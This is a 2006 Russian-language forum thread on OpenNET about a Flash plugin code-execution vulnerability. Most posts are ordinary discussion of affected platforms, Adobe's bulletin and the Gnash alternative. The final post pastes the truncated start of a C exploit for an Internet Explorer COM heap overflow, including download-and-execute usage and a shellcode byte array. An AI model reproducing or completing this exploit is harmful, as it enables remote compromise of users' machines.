The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка  RSS
"OpenNews: В Linux версии Flash плагина обнаружена опасная уя..."
Вариант для распечатки  
Пред. тема | След. тема 
Форумы Разговоры, обсуждение новостей (Public)
Изначальное сообщение [Проследить за развитием треда]

"OpenNews: В Linux версии Flash плагина обнаружена опасная уя..."  
Сообщение от opennews on 14-Сен-06, 01:49 
Во всех версиях Adobe/Macromedia Flash плагина найдена возможность (http://www.securiteam.com/windowsntfocus/5SP0F0UJPC.html) запуска кода на машине пользователя через специально скомпонованный злоумышленником SWF файл.

URL: http://www.securiteam.com/windowsntfocus/5SP0F0UJPC.html
Новость: http://www.opennet.me/opennews/art.shtml?num=8327

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

 Оглавление

Сообщения по теме [Сортировка по времени, UBB]


1. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от Аноним on 14-Сен-06, 01:49 
ATTENTION!
Max, opennet does not work under firefox -- looks like something was broken today or yesterday.
TAKE A LOOK, Please.
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

3. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от Аноним on 14-Сен-06, 07:19 
для этого в адобе сделали таку венечку как : кликните для акливации флеш ролика
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

8. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от PENGUIN of NSK on 14-Сен-06, 13:39 
Вообще-то, в Мелкософте.
JFYI.
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

9. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от Ананимуз on 14-Сен-06, 19:10 
Тогда уж "и в Майкрософте тоже"
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

4. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от жж on 14-Сен-06, 08:05 
у FC5 сегодня вышел апдейт для пакета flash-plugin
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

6. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от edwin email(??) on 14-Сен-06, 11:49 
Господа а каково Ваше мнение о:
http://savannah.gnu.org/projects/gnash
По так сыроват будет
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

13. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от vOrOn email on 14-Сен-06, 22:05 
> Господа а каково Ваше мнение о:
> http://savannah.gnu.org/projects/gnash
> По так сыроват будет

Меня интересовал из этого проекта только плугин к Огнелису. После установки упомянутого, Огнелис успешно крэшился на всех сайтах, где хоть чуточку пахло флешем.
На основании этого смело заявляю - в работе не видел, но осуждаю. :)

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

23. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от _Arti (??) on 17-Сен-06, 19:35 
Версия из CVS работает неплохо. Именно на FreeBSD AMD64 и именно как к плагин к FireFox. В отличие от "родного" флеш плагина, не использует специфичные для конкретной ОС подсистемы (например ALSA). Проект конечно еще сыроват, но с Вашей то помошью он конечно же наберт нужную фкнкциональность очень быстро. На счет скорости.... у Вас наверное нет аппаратной поддержки OpenGL, попробуйте Cairo.
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

22. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от squirL (ok) on 17-Сен-06, 02:14 
>Господа а каково Ваше мнение о:
>http://savannah.gnu.org/projects/gnash
>По так сыроват будет

я когда искал, чем бы на AMD64 FreeBSD посмотреть flash в огнелисе, мне эту фичу в рассылках посоветовали добрые пендостанцы... ужос и кошмар. проц грузит просто немеряно, плюс, как уже сказали валит firefox на каждой второй флэшине. короче живу я без флэша и счастлив :)


Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

10. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от Advanced Аноним on 14-Сен-06, 19:23 
Не очень понятно почему "В Linux версии..." по ссылке вообще слово Linux не упоминается.
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

12. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от pavlinux email(ok) on 14-Сен-06, 21:04 
А ты у производителя поглядел http://www.adobe.com/support/security/bulletins/apsb06-11.html

Multiple Vulnerabilities in Adobe Flash Player 8.0.24.0 and Earlier Versions
Release Date: September 12, 2006
Vulnerability Identifier: APSB06-11
CVE Number: CVE-2006-3014, CVE-2006-3311, CVE-2006-3587, CVE-2006-3588, CVE-2006-4640

Platform: All Platforms
..............^^^^^^^^^^^^^

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

14. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от Advanced Аноним on 15-Сен-06, 00:17 
Так я про то же. Смотри заголовок. "В **Linux** версии Flash плагина обнаружена опасная уязвимость."
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

15. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от GateKeeper (??) on 15-Сен-06, 09:05 
А на этом сайте нас совершенно не интересуют Win* и Tiger* версии.
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

17. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от Квагга on 15-Сен-06, 21:45 
flash - это индустриальный стандарт.

В том числе и баннеры на Opennet :)

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

18. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от Akademic (??) on 15-Сен-06, 21:59 
Чем вам flash не угодил?
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

19. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от XXXL on 15-Сен-06, 22:20 
Лично мне как пользователю *BSD, flash неугодил отсутствием нативной поддержки. И при этом он является типо индустриальным стандартом.
Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

24. "В Linux версии Flash плагина обнаружена опасная уязвимость."  
Сообщение от pavlinux (??) on 18-Сен-06, 00:43 
*
*-----------------------------------------------------------------------
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
* !!! 0day !!!  Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author   : nop
*          : nop#xsec.org
*          : http://www.xsec.org
*          :
* Tested   : Windows 2000 Server SP4 CN
*          :     + Internet Explorer 6.0 SP1
*          : Windows XP SP2 CN
*          :     + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
*          :
* Complie  : cl daxctle2.c
*          :
* Usage       :d:\>daxctle2
*          :
*          :Usage: daxctle <URL> [htmlfile]
*          :
*          :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
*          :
*          
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

// Download Exec Shellcode by nop
unsigned char sc[] =    
"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00"
"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95"
"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x0

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

Архив | Удалить

Индекс форумов | Темы | Пред. тема | След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ] [Рекомендовать для помещения в FAQ]




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру